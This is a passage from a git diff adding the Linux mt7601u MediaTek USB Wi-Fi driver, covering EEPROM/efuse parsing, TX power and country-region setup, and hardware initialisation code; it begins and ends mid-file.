+enum mt76_evt_type { + CMD_DONE, + CMD_ERROR, + CMD_RETRY, + EVENT_PWR_RSP, + EVENT_WOW_RSP, + EVENT_CARRIER_DETECT_RSP, + EVENT_DFS_DETECT_RSP, +}; + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/eeprom.c b/drivers/net/wireless/mediatek/mt7601u/eeprom.c new file mode 100644 index 000000000000..ce3837f270f0 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/eeprom.c @@ -0,0 +1,414 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include +#include +#include +#include +#include +#include "mt7601u.h" +#include "eeprom.h" + +static bool +field_valid(u8 val) +{ + return val != 0xff; +} + +static s8 +field_validate(u8 val) +{ + if (!field_valid(val)) + return 0; + + return val; +} + +static int +mt7601u_efuse_read(struct mt7601u_dev *dev, u16 addr, u8 *data, + enum mt7601u_eeprom_access_modes mode) +{ + u32 val; + int i; + + val = mt76_rr(dev, MT_EFUSE_CTRL); + val &= ~(MT_EFUSE_CTRL_AIN | + MT_EFUSE_CTRL_MODE); + val |= MT76_SET(MT_EFUSE_CTRL_AIN, addr & ~0xf) | + MT76_SET(MT_EFUSE_CTRL_MODE, mode) | + MT_EFUSE_CTRL_KICK; + mt76_wr(dev, MT_EFUSE_CTRL, val); + + if (!mt76_poll(dev, MT_EFUSE_CTRL, MT_EFUSE_CTRL_KICK, 0, 1000)) + return -ETIMEDOUT; + + val = mt76_rr(dev, MT_EFUSE_CTRL); + if ((val & MT_EFUSE_CTRL_AOUT) == MT_EFUSE_CTRL_AOUT) { + /* Parts of eeprom not in the usage map (0x80-0xc0,0xf0) + * will not return valid data but it's ok. + */ + memset(data, 0xff, 16); + return 0; + } + + for (i = 0; i < 4; i++) { + val = mt76_rr(dev, MT_EFUSE_DATA(i)); + put_unaligned_le32(val, data + 4 * i); + } + + return 0; +} + +static int +mt7601u_efuse_physical_size_check(struct mt7601u_dev *dev) +{ + const int map_reads = DIV_ROUND_UP(MT_EFUSE_USAGE_MAP_SIZE, 16); + u8 data[map_reads * 16]; + int ret, i; + u32 start = 0, end = 0, cnt_free; + + for (i = 0; i < map_reads; i++) { + ret = mt7601u_efuse_read(dev, MT_EE_USAGE_MAP_START + i * 16, + data + i * 16, MT_EE_PHYSICAL_READ); + if (ret) + return ret; + } + + for (i = 0; i < MT_EFUSE_USAGE_MAP_SIZE; i++) + if (!data[i]) { + if (!start) + start = MT_EE_USAGE_MAP_START + i; + end = MT_EE_USAGE_MAP_START + i; + } + cnt_free = end - start + 1; + + if (MT_EFUSE_USAGE_MAP_SIZE - cnt_free < 5) { + dev_err(dev->dev, "Error: your device needs default EEPROM file and this driver doesn't support it!\n"); + return -EINVAL; + } + + return 0; +} + +static bool +mt7601u_has_tssi(struct mt7601u_dev *dev, u8 *eeprom) +{ + u16 nic_conf1 = get_unaligned_le16(eeprom + MT_EE_NIC_CONF_1); + + return ~nic_conf1 && (nic_conf1 & MT_EE_NIC_CONF_1_TX_ALC_EN); +} + +static void +mt7601u_set_chip_cap(struct mt7601u_dev *dev, u8 *eeprom) +{ + u16 nic_conf0 = get_unaligned_le16(eeprom + MT_EE_NIC_CONF_0); + u16 nic_conf1 = get_unaligned_le16(eeprom + MT_EE_NIC_CONF_1); + + if (!field_valid(nic_conf1 & 0xff)) + nic_conf1 &= 0xff00; + + dev->ee->tssi_enabled = mt7601u_has_tssi(dev, eeprom) && + !(nic_conf1 & MT_EE_NIC_CONF_1_TEMP_TX_ALC); + + if (nic_conf1 & MT_EE_NIC_CONF_1_HW_RF_CTRL) + dev_err(dev->dev, + "Error: this driver does not support HW RF ctrl\n"); + + if (!field_valid(nic_conf0 >> 8)) + return; + + if (MT76_GET(MT_EE_NIC_CONF_0_RX_PATH, nic_conf0) > 1 || + MT76_GET(MT_EE_NIC_CONF_0_TX_PATH, nic_conf0) > 1) + dev_err(dev->dev, + "Error: device has more than 1 RX/TX stream!\n"); +} + +static int +mt7601u_set_macaddr(struct mt7601u_dev *dev, const u8 *eeprom) +{ + const void *src = eeprom + MT_EE_MAC_ADDR; + + ether_addr_copy(dev->macaddr, src); + + if (!is_valid_ether_addr(dev->macaddr)) { + eth_random_addr(dev->macaddr); + dev_info(dev->dev, + "Invalid MAC address, using random address %pM\n", + dev->macaddr); + } + + mt76_wr(dev, MT_MAC_ADDR_DW0, get_unaligned_le32(dev->macaddr)); + mt76_wr(dev, MT_MAC_ADDR_DW1, get_unaligned_le16(dev->macaddr + 4) | + MT76_SET(MT_MAC_ADDR_DW1_U2ME_MASK, 0xff)); + + return 0; +} + +static void mt7601u_set_channel_target_power(struct mt7601u_dev *dev, + u8 *eeprom, u8 max_pwr) +{ + u8 trgt_pwr = eeprom[MT_EE_TX_TSSI_TARGET_POWER]; + + if (trgt_pwr > max_pwr || !trgt_pwr) { + dev_warn(dev->dev, "Error: EEPROM trgt power invalid %hhx!\n", + trgt_pwr); + trgt_pwr = 0x20; + } + + memset(dev->ee->chan_pwr, trgt_pwr, sizeof(dev->ee->chan_pwr)); +} + +static void +mt7601u_set_channel_power(struct mt7601u_dev *dev, u8 *eeprom) +{ + u32 i, val; + u8 max_pwr; + + val = mt7601u_rr(dev, MT_TX_ALC_CFG_0); + max_pwr = MT76_GET(MT_TX_ALC_CFG_0_LIMIT_0, val); + + if (mt7601u_has_tssi(dev, eeprom)) { + mt7601u_set_channel_target_power(dev, eeprom, max_pwr); + return; + } + + for (i = 0; i < 14; i++) { + s8 power = field_validate(eeprom[MT_EE_TX_POWER_OFFSET + i]); + + if (power > max_pwr || power < 0) + power = MT7601U_DEFAULT_TX_POWER; + + dev->ee->chan_pwr[i] = power; + } +} + +static void +mt7601u_set_country_reg(struct mt7601u_dev *dev, u8 *eeprom) +{ + /* Note: - region 31 is not valid for mt7601u (see rtmp_init.c) + * - comments in rtmp_def.h are incorrect (see rt_channel.c) + */ + static const struct reg_channel_bounds chan_bounds[] = { + /* EEPROM country regions 0 - 7 */ + { 1, 11 }, { 1, 13 }, { 10, 2 }, { 10, 4 }, + { 14, 1 }, { 1, 14 }, { 3, 7 }, { 5, 9 }, + /* EEPROM country regions 32 - 33 */ + { 1, 11 }, { 1, 14 } + }; + u8 val = eeprom[MT_EE_COUNTRY_REGION]; + int idx = -1; + + if (val < 8) + idx = val; + if (val > 31 && val < 33) + idx = val - 32 + 8; + + if (idx != -1) + dev_info(dev->dev, + "EEPROM country region %02hhx (channels %hhd-%hhd)\n", + val, chan_bounds[idx].start, + chan_bounds[idx].start + chan_bounds[idx].num - 1); + else + idx = 5; /* channels 1 - 14 */ + + dev->ee->reg = chan_bounds[idx]; + + /* TODO: country region 33 is special - phy should be set to B-mode + * before entering channel 14 (see sta/connect.c) + */ +} + +static void +mt7601u_set_rf_freq_off(struct mt7601u_dev *dev, u8 *eeprom) +{ + u8 comp; + + dev->ee->rf_freq_off = field_validate(eeprom[MT_EE_FREQ_OFFSET]); + comp = field_validate(eeprom[MT_EE_FREQ_OFFSET_COMPENSATION]); + + if (comp & BIT(7)) + dev->ee->rf_freq_off -= comp & 0x7f; + else + dev->ee->rf_freq_off += comp; +} + +static void +mt7601u_set_rssi_offset(struct mt7601u_dev *dev, u8 *eeprom) +{ + int i; + s8 *rssi_offset = dev->ee->rssi_offset; + + for (i = 0; i < 2; i++) { + rssi_offset[i] = eeprom[MT_EE_RSSI_OFFSET + i]; + + if (rssi_offset[i] < -10 || rssi_offset[i] > 10) { + dev_warn(dev->dev, + "Warning: EEPROM RSSI is invalid %02hhx\n", + rssi_offset[i]); + rssi_offset[i] = 0; + } + } +} + +static void +mt7601u_extra_power_over_mac(struct mt7601u_dev *dev) +{ + u32 val; + + val = ((mt7601u_rr(dev, MT_TX_PWR_CFG_1) & 0x0000ff00) >> 8); + val |= ((mt7601u_rr(dev, MT_TX_PWR_CFG_2) & 0x0000ff00) << 8); + mt7601u_wr(dev, MT_TX_PWR_CFG_7, val); + + val = ((mt7601u_rr(dev, MT_TX_PWR_CFG_4) & 0x0000ff00) >> 8); + mt7601u_wr(dev, MT_TX_PWR_CFG_9, val); +} + +static void +mt7601u_set_power_rate(struct power_per_rate *rate, s8 delta, u8 value) +{ + rate->raw = s6_validate(value); + rate->bw20 = s6_to_int(value); + /* Note: vendor driver does cap the value to s6 right away */ + rate->bw40 = rate->bw20 + delta; +} + +static void +mt7601u_save_power_rate(struct mt7601u_dev *dev, s8 delta, u32 val, int i) +{ + struct mt7601u_rate_power *t = &dev->ee->power_rate_table; + + switch (i) { + case 0: + mt7601u_set_power_rate(&t->cck[0], delta, (val >> 0) & 0xff); + mt7601u_set_power_rate(&t->cck[1], delta, (val >> 8) & 0xff); + /* Save cck bw20 for fixups of channel 14 */ + dev->ee->real_cck_bw20[0] = t->cck[0].bw20; + dev->ee->real_cck_bw20[1] = t->cck[1].bw20; + + mt7601u_set_power_rate(&t->ofdm[0], delta, (val >> 16) & 0xff); + mt7601u_set_power_rate(&t->ofdm[1], delta, (val >> 24) & 0xff); + break; + case 1: + mt7601u_set_power_rate(&t->ofdm[2], delta, (val >> 0) & 0xff); + mt7601u_set_power_rate(&t->ofdm[3], delta, (val >> 8) & 0xff); + mt7601u_set_power_rate(&t->ht[0], delta, (val >> 16) & 0xff); + mt7601u_set_power_rate(&t->ht[1], delta, (val >> 24) & 0xff); + break; + case 2: + mt7601u_set_power_rate(&t->ht[2], delta, (val >> 0) & 0xff); + mt7601u_set_power_rate(&t->ht[3], delta, (val >> 8) & 0xff); + break; + } +} + +static s8 +get_delta(u8 val) +{ + s8 ret; + + if (!field_valid(val) || !(val & BIT(7))) + return 0; + + ret = val & 0x1f; + if (ret > 8) + ret = 8; + if (val & BIT(6)) + ret = -ret; + + return ret; +} + +static void +mt7601u_config_tx_power_per_rate(struct mt7601u_dev *dev, u8 *eeprom) +{ + u32 val; + s8 bw40_delta; + int i; + + bw40_delta = get_delta(eeprom[MT_EE_TX_POWER_DELTA_BW40]); + + for (i = 0; i < 5; i++) { + val = get_unaligned_le32(eeprom + MT_EE_TX_POWER_BYRATE(i)); + + mt7601u_save_power_rate(dev, bw40_delta, val, i); + + if (~val) + mt7601u_wr(dev, MT_TX_PWR_CFG_0 + i * 4, val); + } + + mt7601u_extra_power_over_mac(dev); +} + +static void +mt7601u_init_tssi_params(struct mt7601u_dev *dev, u8 *eeprom) +{ + struct tssi_data *d = &dev->ee->tssi_data; + + if (!dev->ee->tssi_enabled) + return; + + d->slope = eeprom[MT_EE_TX_TSSI_SLOPE]; + d->tx0_delta_offset = eeprom[MT_EE_TX_TSSI_OFFSET] * 1024; + d->offset[0] = eeprom[MT_EE_TX_TSSI_OFFSET_GROUP]; + d->offset[1] = eeprom[MT_EE_TX_TSSI_OFFSET_GROUP + 1]; + d->offset[2] = eeprom[MT_EE_TX_TSSI_OFFSET_GROUP + 2]; +} + +int +mt7601u_eeprom_init(struct mt7601u_dev *dev) +{ + u8 *eeprom; + int i, ret; + + ret = mt7601u_efuse_physical_size_check(dev); + if (ret) + return ret; + + dev->ee = devm_kzalloc(dev->dev, sizeof(*dev->ee), GFP_KERNEL); + if (!dev->ee) + return -ENOMEM; + + eeprom = kmalloc(MT7601U_EEPROM_SIZE, GFP_KERNEL); + if (!eeprom) + return -ENOMEM; + + for (i = 0; i + 16 <= MT7601U_EEPROM_SIZE; i += 16) { + ret = mt7601u_efuse_read(dev, i, eeprom + i, MT_EE_READ); + if (ret) + goto out; + } + + if (eeprom[MT_EE_VERSION_EE] > MT7601U_EE_MAX_VER) + dev_warn(dev->dev, + "Warning: unsupported EEPROM version %02hhx\n", + eeprom[MT_EE_VERSION_EE]); + dev_info(dev->dev, "EEPROM ver:%02hhx fae:%02hhx\n", + eeprom[MT_EE_VERSION_EE], eeprom[MT_EE_VERSION_FAE]); + + mt7601u_set_macaddr(dev, eeprom); + mt7601u_set_chip_cap(dev, eeprom); + mt7601u_set_channel_power(dev, eeprom); + mt7601u_set_country_reg(dev, eeprom); + mt7601u_set_rf_freq_off(dev, eeprom); + mt7601u_set_rssi_offset(dev, eeprom); + dev->ee->ref_temp = eeprom[MT_EE_REF_TEMP]; + dev->ee->lna_gain = eeprom[MT_EE_LNA_GAIN]; + + mt7601u_config_tx_power_per_rate(dev, eeprom); + + mt7601u_init_tssi_params(dev, eeprom); +out: + kfree(eeprom); + return ret; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/eeprom.h b/drivers/net/wireless/mediatek/mt7601u/eeprom.h new file mode 100644 index 000000000000..662d12703b69 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/eeprom.h @@ -0,0 +1,151 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT7601U_EEPROM_H +#define __MT7601U_EEPROM_H + +struct mt7601u_dev; + +#define MT7601U_EE_MAX_VER 0x0c +#define MT7601U_EEPROM_SIZE 256 + +#define MT7601U_DEFAULT_TX_POWER 6 + +enum mt76_eeprom_field { + MT_EE_CHIP_ID = 0x00, + MT_EE_VERSION_FAE = 0x02, + MT_EE_VERSION_EE = 0x03, + MT_EE_MAC_ADDR = 0x04, + MT_EE_NIC_CONF_0 = 0x34, + MT_EE_NIC_CONF_1 = 0x36, + MT_EE_COUNTRY_REGION = 0x39, + MT_EE_FREQ_OFFSET = 0x3a, + MT_EE_NIC_CONF_2 = 0x42, + + MT_EE_LNA_GAIN = 0x44, + MT_EE_RSSI_OFFSET = 0x46, + + MT_EE_TX_POWER_DELTA_BW40 = 0x50, + MT_EE_TX_POWER_OFFSET = 0x52, + + MT_EE_TX_TSSI_SLOPE = 0x6e, + MT_EE_TX_TSSI_OFFSET_GROUP = 0x6f, + MT_EE_TX_TSSI_OFFSET = 0x76, + + MT_EE_TX_TSSI_TARGET_POWER = 0xd0, + MT_EE_REF_TEMP = 0xd1, + MT_EE_FREQ_OFFSET_COMPENSATION = 0xdb, + MT_EE_TX_POWER_BYRATE_BASE = 0xde, + + MT_EE_USAGE_MAP_START = 0x1e0, + MT_EE_USAGE_MAP_END = 0x1fc, +}; + +#define MT_EE_NIC_CONF_0_RX_PATH GENMASK(3, 0) +#define MT_EE_NIC_CONF_0_TX_PATH GENMASK(7, 4) +#define MT_EE_NIC_CONF_0_BOARD_TYPE GENMASK(13, 12) + +#define MT_EE_NIC_CONF_1_HW_RF_CTRL BIT(0) +#define MT_EE_NIC_CONF_1_TEMP_TX_ALC BIT(1) +#define MT_EE_NIC_CONF_1_LNA_EXT_2G BIT(2) +#define MT_EE_NIC_CONF_1_LNA_EXT_5G BIT(3) +#define MT_EE_NIC_CONF_1_TX_ALC_EN BIT(13) + +#define MT_EE_NIC_CONF_2_RX_STREAM GENMASK(3, 0) +#define MT_EE_NIC_CONF_2_TX_STREAM GENMASK(7, 4) +#define MT_EE_NIC_CONF_2_HW_ANTDIV BIT(8) +#define MT_EE_NIC_CONF_2_XTAL_OPTION GENMASK(10, 9) +#define MT_EE_NIC_CONF_2_TEMP_DISABLE BIT(11) +#define MT_EE_NIC_CONF_2_COEX_METHOD GENMASK(15, 13) + +#define MT_EE_TX_POWER_BYRATE(i) (MT_EE_TX_POWER_BYRATE_BASE + \ + (i) * 4) + +#define MT_EFUSE_USAGE_MAP_SIZE (MT_EE_USAGE_MAP_END - \ + MT_EE_USAGE_MAP_START + 1) + +enum mt7601u_eeprom_access_modes { + MT_EE_READ = 0, + MT_EE_PHYSICAL_READ = 1, +}; + +struct power_per_rate { + u8 raw; /* validated s6 value */ + s8 bw20; /* sign-extended int */ + s8 bw40; /* sign-extended int */ +}; + +/* Power per rate - one value per two rates */ +struct mt7601u_rate_power { + struct power_per_rate cck[2]; + struct power_per_rate ofdm[4]; + struct power_per_rate ht[4]; +}; + +struct reg_channel_bounds { + u8 start; + u8 num; +}; + +struct mt7601u_eeprom_params { + bool tssi_enabled; + u8 rf_freq_off; + s8 rssi_offset[2]; + s8 ref_temp; + s8 lna_gain; + + u8 chan_pwr[14]; + struct mt7601u_rate_power power_rate_table; + s8 real_cck_bw20[2]; + + /* TSSI stuff - only with internal TX ALC */ + struct tssi_data { + int tx0_delta_offset; + u8 slope; + u8 offset[3]; + } tssi_data; + + struct reg_channel_bounds reg; +}; + +int mt7601u_eeprom_init(struct mt7601u_dev *dev); + +static inline u32 s6_validate(u32 reg) +{ + WARN_ON(reg & ~GENMASK(5, 0)); + return reg & GENMASK(5, 0); +} + +static inline int s6_to_int(u32 reg) +{ + int s6; + + s6 = s6_validate(reg); + if (s6 & BIT(5)) + s6 -= BIT(6); + + return s6; +} + +static inline u32 int_to_s6(int val) +{ + if (val < -0x20) + return 0x20; + if (val > 0x1f) + return 0x1f; + + return val & 0x3f; +} + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/init.c b/drivers/net/wireless/mediatek/mt7601u/init.c new file mode 100644 index 000000000000..1fc86e865c8c --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/init.c @@ -0,0 +1,625 @@ +/* + * (c) Copyright 2002-2010, Ralink Technology, Inc. + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include "mt7601u.h" +#include "eeprom.h" +#include "trace.h" +#include "mcu.h" + +#include "initvals.h" + +static void +mt7601u_set_wlan_state(struct mt7601u_dev *dev, u32 val, bool enable) +{ + int i; + + /* Note: we don't turn off WLAN_CLK because that makes the device + * not respond properly on the probe path. + * In case anyone (PSM?) wants to use this function we can + * bring the clock stuff back and fixup the probe path. + */ + + if (enable) + val |= (MT_WLAN_FUN_CTRL_WLAN_EN | + MT_WLAN_FUN_CTRL_WLAN_CLK_EN); + else + val &= ~(MT_WLAN_FUN_CTRL_WLAN_EN); + + mt7601u_wr(dev, MT_WLAN_FUN_CTRL, val); + udelay(20); + + if (enable) { + set_bit(MT7601U_STATE_WLAN_RUNNING, &dev->state); + } else { + clear_bit(MT7601U_STATE_WLAN_RUNNING, &dev->state); + return; + } + + for (i = 200; i; i--) { + val = mt7601u_rr(dev, MT_CMB_CTRL); + + if (val & MT_CMB_CTRL_XTAL_RDY && val & MT_CMB_CTRL_PLL_LD) + break; + + udelay(20); + } + + /* Note: vendor driver tries to disable/enable wlan here and retry + * but the code which does it is so buggy it must have never + * triggered, so don't bother. + */ + if (!i) + dev_err(dev->dev, "Error: PLL and XTAL check failed!\n"); +} + +static void mt7601u_chip_onoff(struct mt7601u_dev *dev, bool enable, bool reset) +{ + u32 val; + + mutex_lock(&dev->hw_atomic_mutex); + + val = mt7601u_rr(dev, MT_WLAN_FUN_CTRL); + + if (reset) { + val |= MT_WLAN_FUN_CTRL_GPIO_OUT_EN; + val &= ~MT_WLAN_FUN_CTRL_FRC_WL_ANT_SEL; + + if (val & MT_WLAN_FUN_CTRL_WLAN_EN) { + val |= (MT_WLAN_FUN_CTRL_WLAN_RESET | + MT_WLAN_FUN_CTRL_WLAN_RESET_RF); + mt7601u_wr(dev, MT_WLAN_FUN_CTRL, val); + udelay(20); + + val &= ~(MT_WLAN_FUN_CTRL_WLAN_RESET | + MT_WLAN_FUN_CTRL_WLAN_RESET_RF); + } + } + + mt7601u_wr(dev, MT_WLAN_FUN_CTRL, val); + udelay(20); + + mt7601u_set_wlan_state(dev, val, enable); + + mutex_unlock(&dev->hw_atomic_mutex); +} + +static void mt7601u_reset_csr_bbp(struct mt7601u_dev *dev) +{ + mt7601u_wr(dev, MT_MAC_SYS_CTRL, (MT_MAC_SYS_CTRL_RESET_CSR | + MT_MAC_SYS_CTRL_RESET_BBP)); + mt7601u_wr(dev, MT_USB_DMA_CFG, 0); + msleep(1); + mt7601u_wr(dev, MT_MAC_SYS_CTRL, 0); +} + +static void mt7601u_init_usb_dma(struct mt7601u_dev *dev) +{ + u32 val; + + val = MT76_SET(MT_USB_DMA_CFG_RX_BULK_AGG_TOUT, MT_USB_AGGR_TIMEOUT) | + MT76_SET(MT_USB_DMA_CFG_RX_BULK_AGG_LMT, MT_USB_AGGR_SIZE_LIMIT) | + MT_USB_DMA_CFG_RX_BULK_EN | + MT_USB_DMA_CFG_TX_BULK_EN; + if (dev->in_max_packet == 512) + val |= MT_USB_DMA_CFG_RX_BULK_AGG_EN; + mt7601u_wr(dev, MT_USB_DMA_CFG, val); + + val |= MT_USB_DMA_CFG_UDMA_RX_WL_DROP; + mt7601u_wr(dev, MT_USB_DMA_CFG, val); + val &= ~MT_USB_DMA_CFG_UDMA_RX_WL_DROP; + mt7601u_wr(dev, MT_USB_DMA_CFG, val); +} + +static int mt7601u_init_bbp(struct mt7601u_dev *dev) +{ + int ret; + + ret = mt7601u_wait_bbp_ready(dev); + if (ret) + return ret; + + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, bbp_common_vals, + ARRAY_SIZE(bbp_common_vals)); + if (ret) + return ret; + + return mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, bbp_chip_vals, + ARRAY_SIZE(bbp_chip_vals)); +} + +static void +mt76_init_beacon_offsets(struct mt7601u_dev *dev) +{ + u16 base = MT_BEACON_BASE; + u32 regs[4] = {}; + int i; + + for (i = 0; i < 16; i++) { + u16 addr = dev->beacon_offsets[i]; + + regs[i / 4] |= ((addr - base) / 64) << (8 * (i % 4)); + } + + for (i = 0; i < 4; i++) + mt7601u_wr(dev, MT_BCN_OFFSET(i), regs[i]); +} + +static int mt7601u_write_mac_initvals(struct mt7601u_dev *dev) +{ + int ret; + + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_WLAN, mac_common_vals, + ARRAY_SIZE(mac_common_vals)); + if (ret) + return ret; + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_WLAN, + mac_chip_vals, ARRAY_SIZE(mac_chip_vals)); + if (ret) + return ret; + + mt76_init_beacon_offsets(dev); + + mt7601u_wr(dev, MT_AUX_CLK_CFG, 0); + + return 0; +} + +static int mt7601u_init_wcid_mem(struct mt7601u_dev *dev) +{ + u32 *vals; + int i, ret; + + vals = kmalloc(sizeof(*vals) * N_WCIDS * 2, GFP_KERNEL); + if (!vals) + return -ENOMEM; + + for (i = 0; i < N_WCIDS; i++) { + vals[i * 2] = 0xffffffff; + vals[i * 2 + 1] = 0x00ffffff; + } + + ret = mt7601u_burst_write_regs(dev, MT_WCID_ADDR_BASE, + vals, N_WCIDS * 2); + kfree(vals); + + return ret; +} + +static int mt7601u_init_key_mem(struct mt7601u_dev *dev) +{ + u32 vals[4] = {}; + + return mt7601u_burst_write_regs(dev, MT_SKEY_MODE_BASE_0, + vals, ARRAY_SIZE(vals)); +} + +static int mt7601u_init_wcid_attr_mem(struct mt7601u_dev *dev) +{ + u32 *vals; + int i, ret; + + vals = kmalloc(sizeof(*vals) * N_WCIDS * 2, GFP_KERNEL); + if (!vals) + return -ENOMEM; + + for (i = 0; i < N_WCIDS * 2; i++) + vals[i] = 1; + + ret = mt7601u_burst_write_regs(dev, MT_WCID_ATTR_BASE, + vals, N_WCIDS * 2); + kfree(vals); + + return ret; +} + +static void mt7601u_reset_counters(struct mt7601u_dev *dev) +{ + mt7601u_rr(dev, MT_RX_STA_CNT0); + mt7601u_rr(dev, MT_RX_STA_CNT1); + mt7601u_rr(dev, MT_RX_STA_CNT2); + mt7601u_rr(dev, MT_TX_STA_CNT0); + mt7601u_rr(dev, MT_TX_STA_CNT1); + mt7601u_rr(dev, MT_TX_STA_CNT2); +} + +int mt7601u_mac_start(struct mt7601u_dev *dev) +{ + mt7601u_wr(dev, MT_MAC_SYS_CTRL, MT_MAC_SYS_CTRL_ENABLE_TX); + + if (!mt76_poll(dev, MT_WPDMA_GLO_CFG, MT_WPDMA_GLO_CFG_TX_DMA_BUSY | + MT_WPDMA_GLO_CFG_RX_DMA_BUSY, 0, 200000)) + return -ETIMEDOUT; + + dev->rxfilter = MT_RX_FILTR_CFG_CRC_ERR | + MT_RX_FILTR_CFG_PHY_ERR | MT_RX_FILTR_CFG_PROMISC | + MT_RX_FILTR_CFG_VER_ERR | MT_RX_FILTR_CFG_DUP | + MT_RX_FILTR_CFG_CFACK | MT_RX_FILTR_CFG_CFEND | + MT_RX_FILTR_CFG_ACK | MT_RX_FILTR_CFG_CTS | + MT_RX_FILTR_CFG_RTS | MT_RX_FILTR_CFG_PSPOLL | + MT_RX_FILTR_CFG_BA | MT_RX_FILTR_CFG_CTRL_RSV; + mt7601u_wr(dev, MT_RX_FILTR_CFG, dev->rxfilter); + + mt7601u_wr(dev, MT_MAC_SYS_CTRL, + MT_MAC_SYS_CTRL_ENABLE_TX | MT_MAC_SYS_CTRL_ENABLE_RX); + + if (!mt76_poll(dev, MT_WPDMA_GLO_CFG, MT_WPDMA_GLO_CFG_TX_DMA_BUSY | + MT_WPDMA_GLO_CFG_RX_DMA_BUSY, 0, 50)) + return -ETIMEDOUT; + + return 0; +} + +static void mt7601u_mac_stop_hw(struct mt7601u_dev *dev) +{ + int i, ok; + + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return; + + mt76_clear(dev, MT_BEACON_TIME_CFG, MT_BEACON_TIME_CFG_TIMER_EN | + MT_BEACON_TIME_CFG_SYNC_MODE | MT_BEACON_TIME_CFG_TBTT_EN | + MT_BEACON_TIME_CFG_BEACON_TX); + + if (!mt76_poll(dev, MT_USB_DMA_CFG, MT_USB_DMA_CFG_TX_BUSY, 0, 1000)) + dev_warn(dev->dev, "Warning: TX DMA did not stop!\n"); + + /* Page count on TxQ */ + i = 200; + while (i-- && ((mt76_rr(dev, 0x0438) & 0xffffffff) || + (mt76_rr(dev, 0x0a30) & 0x000000ff) || + (mt76_rr(dev, 0x0a34) & 0x00ff00ff))) + msleep(10); + + if (!mt76_poll(dev, MT_MAC_STATUS, MT_MAC_STATUS_TX, 0, 1000)) + dev_warn(dev->dev, "Warning: MAC TX did not stop!\n"); + + mt76_clear(dev, MT_MAC_SYS_CTRL, MT_MAC_SYS_CTRL_ENABLE_RX | + MT_MAC_SYS_CTRL_ENABLE_TX); + + /* Page count on RxQ */ + ok = 0; + i = 200; + while (i--) { + if ((mt76_rr(dev, 0x0430) & 0x00ff0000) || + (mt76_rr(dev, 0x0a30) & 0xffffffff) || + (mt76_rr(dev, 0x0a34) & 0xffffffff)) + ok++; + if (ok > 6) + break; + + msleep(1); + } + + if (!mt76_poll(dev, MT_MAC_STATUS, MT_MAC_STATUS_RX, 0, 1000)) + dev_warn(dev->dev, "Warning: MAC RX did not stop!\n"); + + if (!mt76_poll(dev, MT_USB_DMA_CFG, MT_USB_DMA_CFG_RX_BUSY, 0, 1000)) + dev_warn(dev->dev, "Warning: RX DMA did not stop!\n"); +} + +void mt7601u_mac_stop(struct mt7601u_dev *dev) +{ + mt7601u_mac_stop_hw(dev); + flush_delayed_work(&dev->stat_work); + cancel_delayed_work_sync(&dev->stat_work); +} + +static void mt7601u_stop_hardware(struct mt7601u_dev *dev) +{ + mt7601u_chip_onoff(dev, false, false); +} + +int mt7601u_init_hardware(struct mt7601u_dev *dev) +{ + static const u16 beacon_offsets[16] = { + /* 512 byte per beacon */ + 0xc000, 0xc200, 0xc400, 0xc600, + 0xc800, 0xca00, 0xcc00, 0xce00, + 0xd000, 0xd200, 0xd400, 0xd600, + 0xd800, 0xda00, 0xdc00, 0xde00 + }; + int ret; + + dev->beacon_offsets = beacon_offsets; + + mt7601u_chip_onoff(dev, true, false); + + ret = mt7601u_wait_asic_ready(dev); + if (ret) + goto err; + ret = mt7601u_mcu_init(dev); + if (ret) + goto err; + + if (!mt76_poll_msec(dev, MT_WPDMA_GLO_CFG, + MT_WPDMA_GLO_CFG_TX_DMA_BUSY | + MT_WPDMA_GLO_CFG_RX_DMA_BUSY, 0, 100)) { + ret = -EIO; + goto err; + } + + /* Wait for ASIC ready after FW load. */ + ret = mt7601u_wait_asic_ready(dev); + if (ret) + goto err; + + mt7601u_reset_csr_bbp(dev); + mt7601u_init_usb_dma(dev); + + ret = mt7601u_mcu_cmd_init(dev); + if (ret) + goto err; + ret = mt7601u_dma_init(dev); + if (ret) + goto err_mcu; + ret = mt7601u_write_mac_initvals(dev); + if (ret) + goto err_rx; + + if (!mt76_poll_msec(dev, MT_MAC_STATUS, + MT_MAC_STATUS_TX | MT_MAC_STATUS_RX, 0, 100)) { + ret = -EIO; + goto err_rx; + } + + ret = mt7601u_init_bbp(dev); + if (ret) + goto err_rx; + ret = mt7601u_init_wcid_mem(dev); + if (ret) + goto err_rx; + ret = mt7601u_init_key_mem(dev); + if (ret) + goto err_rx; + ret = mt7601u_init_wcid_attr_mem(dev); + if (ret) + goto err_rx; + + mt76_clear(dev, MT_BEACON_TIME_CFG, (MT_BEACON_TIME_CFG_TIMER_EN | + MT_BEACON_TIME_CFG_SYNC_MODE | + 